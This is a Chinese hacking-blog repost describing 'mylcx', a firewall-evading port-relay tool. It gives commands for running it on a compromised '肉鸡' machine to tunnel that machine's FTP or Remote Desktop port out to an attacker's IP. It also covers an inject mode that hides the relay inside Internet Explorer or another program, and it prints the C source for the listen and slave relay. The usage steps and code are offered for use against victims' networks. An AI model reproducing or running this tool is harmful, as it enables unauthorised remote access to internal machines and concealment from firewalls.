Ψ小川Ψ dě Blog

Home » » 【转】mylcx 穿墙版

【转】mylcx 穿墙版

作者:gaohui

mylcx -listen 这个命令跟lcx一样
mylcx -slave 本机端口 远程ip 远程端口
即把本机端口映射到远程ip的一个端口上

在本机执行:mylcx -listen 5000 21
在肉鸡上执行:mylcx -slave 21 你的ip 5000
然后连接ftp 127.0.0.1 就可以登录远程的ftp了

简单说下第三个参数吧

mylcx -inject port1 remoteip remoteport [-path exepath]

port1是被映射的端口

remoteip 是映射的远程机器

remoteport是远程端口

比如我们想连对方的3389端口,而对方又是内网没法直接连,并且对方又又防火墙普通的lcx没法转发,那就在对方机器上运行

mylcx -inject 3389 56.78.90.12 5000

然后在自己的机器上运行

mylcx -listen 5000 5001

最后打开mstsc,输入127.0.0.1:5001既可连接对方3389端口。

默认的mylcx 会插入到C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE中去运行,我们也可以指定他插入到别的程序里面运行,只要这个程序能允许访问网络,比如说d:\tools\flashfxp.exe,那我们可以在对方机器上运行

mylcx -inject 3389 56.78.90.12 5000 -path “d:\tools\flashfxp.exe”

就可以了,尽情发挥吧。需要注意一点的是,不是所有程序都可以用来插入的,有些程序可能会插入失败或者插入后运行失败,都是有可能的。

 

附上源码:(嘿嘿,英文不好,变量名都是乱起,而且比较乱,见笑了)

#include <stdio.h>
#include <winsock2.h>
#include <stdlib.h>
#pragma comment(lib,”Ws2_32″)

HANDLE hevent;

 

typedef struct _s1ands2
{
SOCKET s1;
SOCKET s2;
} s1ands2;

typedef struct _info{
int listenorslave; //1-listen 2-slave
unsigned short listen_port1;
unsigned short listen_port2;
unsigned short slave_local;
char remoteip[16];
unsigned short remoteport;
} info;

 

DWORD WINAPI s1tos2(LPVOID p)
{
s1ands2* temp=(s1ands2*)p;
char buff[2048]={0};
int bytesdone;

SOCKET s1,s2;
s1=temp->s1;
s2=temp->s2;
while(1)
{
int errorcode;
bytesdone=recv(s1,buff,2048,0);

errorcode=GetLastError();
if(bytesdone<=0)
//if(bytesdone<=0)
{
SetEvent(hevent);
return 0;
}
printf(“%d bytes=%d\n”,errorcode,bytesdone);
bytesdone=send(s2,buff,bytesdone,0);
errorcode=GetLastError();
//if(errorcode>0)
if(bytesdone<=0)
{
SetEvent(hevent);
return 0;
}

}
return 0;

}
/*

DWORD WINAPI s2tos1(LPVOID p)
{
s1ands2* temp=(s1ands2*)p;
char buff[2048]={0};
int bytesdone;

SOCKET s1,s2;
s1=temp->s1;
s2=temp->s2;
while(1)
{
bytesdone=recv(s2,buff,2048,0);
send(s1,buff,bytesdone,0);
}

return 0;

}
*/
int lcxlisten(unsigned short p1,unsigned short p2)
{
SOCKET s1,s2,rs1,rs2;

unsigned short port1,port2;

int len1,len2;

port1=p1;

port2=p2;

s1=socket(AF_INET,SOCK_STREAM,0);

sockaddr_in addr1,addr2;
sockaddr_in raddr1,raddr2;

addr1.sin_family=AF_INET;

addr1.sin_addr.S_un.S_addr=INADDR_ANY;

addr1.sin_port=htons(port1);

addr2.sin_family=AF_INET;

addr2.sin_addr.S_un.S_addr=INADDR_ANY;

addr2.sin_port=htons(port2);

bind(s1,(const sockaddr *)&addr1,sizeof(addr1));

s2=socket(AF_INET,SOCK_STREAM,0);

bind(s2,(const sockaddr *)&addr2,sizeof(addr2));

listen(s1,5);

listen(s2,5);

len1=sizeof(raddr1);

len2=sizeof(raddr2);

printf(“waiting on port %d…\n”,port1);

rs1=accept(s1,(struct sockaddr *)&raddr1,&len1);

printf(“%s connected\n”,inet_ntoa(raddr1.sin_addr));

printf(“wating on port %d…\n”,port2);

rs2=accept(s2,(struct sockaddr *)&raddr2,&len2);

printf(“go…\n”);

s1ands2 temp1,temp2;

temp1.s1=rs1;

temp1.s2=rs2;

CreateThread(NULL,NULL,s1tos2,&temp1,NULL,NULL);

temp2.s1=rs2;

temp2.s2=rs1;

CreateThread(NULL,NULL,s1tos2,&temp2,NULL,NULL);

hevent=CreateEvent(NULL,false,false,NULL);

//hevent[1]=CreateEvent(NULL,false,false,NULL);

//WaitForMultipleObjects(2,&hevent,false,INFINITE);
WaitForSingleObject(hevent,INFINITE);
printf(“end waiting1\n”);
CloseHandle(hevent);
closesocket(rs1);
closesocket(rs2);
closesocket(s1);
closesocket(s2);
return 0;
}

int lcxslave(unsigned short local,char* remoteip,unsigned short remoteport)
{
WSADATA wsa;

WSAStartup(MAKEWORD(2,2),&wsa);

SOCKET s1,s2;

sockaddr_in addr1,addr2;

addr1.sin_family=AF_INET;

addr1.sin_addr.S_un.S_addr=inet_addr(remoteip);

addr1.sin_port=htons(remoteport);

s1=socket(AF_INET,SOCK_STREAM,0);

if(connect(s1,(const struct sockaddr*)&addr1,sizeof(addr1)))
{
closesocket(s1);
return 0;
}

s2=socket(AF_INET,SOCK_STREAM,0);

addr2.sin_family=AF_INET;

addr2.sin_addr.S_un.S_addr=inet_addr(“127.0.0.1”);

addr2.sin_port=htons(local);

if(connect(s2,(const struct sockaddr*)&addr2,sizeof(addr2)))
{
closesocket(s1);
closesocket(s2);
return 0;
}

s1ands2 temp,temp2;

temp.s1=s1;

temp.s2=s2;

CreateThread(NULL,NULL,s1tos2,&temp,NULL,NULL);

temp2.s1=s2;

temp2.s2=s1;

CreateThread(NULL,NULL,s1tos2,&temp2,NULL,NULL);

hevent=CreateEvent(NULL,false,false,NULL);

//hevent[1]=CreateEvent(NULL,false,false,NULL);

//WaitForMultipleObjects(2,&hevent,false,INFINITE);
WaitForSingleObject(hevent,INFINITE);

printf(“end waiting2\n”);

CloseHandle(hevent);
closesocket(s1);
closesocket(s2);

return 0;
}

int main(int argc, char* argv[])
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,2),&wsa);
if(argc<2)
{
printf(“usage:mylcx.exe -listen port1 port2\n”
“mylcx.exe -slave localport remoteip remoteport\n”);
return 0;
}
if(strcmp(argv[1],”-listen”)==0)
{
while(1){
lcxlisten(atoi(argv[2]),atoi(argv[3]));
Sleep(1000);
}
return 0;
}
if(strcmp(argv[1],”-slave”)==0)
{
while(1)
{
lcxslave(atoi(argv[2]),argv[3],atoi(argv[4]));
Sleep(1000);
}
return 0;

}
//lcxlisten(5000,21);
//lcxslave(800,”127.0.0.1″,5000);
return 0;
}

No comment yet.

添加评论

? razz sad evil ! smile oops grin eek shock ??? cool lol mad twisted roll wink idea arrow neutral cry mrgreen mrgreen

1 + 3 =